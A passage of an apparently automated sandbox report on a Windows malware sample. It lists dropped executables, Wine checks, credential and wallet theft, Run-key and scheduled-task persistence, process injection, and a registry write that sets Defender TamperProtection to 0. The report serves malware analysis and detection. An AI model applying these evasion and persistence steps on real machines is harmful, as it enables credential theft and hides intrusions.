N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091747001\d7289d778f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091749001\4629fe53b0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\db4b761fdf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\db4b761fdf.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091749001\4629fe53b0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091747001\d7289d778f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133848779747409536" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 428 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 428 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 428 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1828 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 1828 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 1828 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1828 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1828 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1828 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 1828 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 1828 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
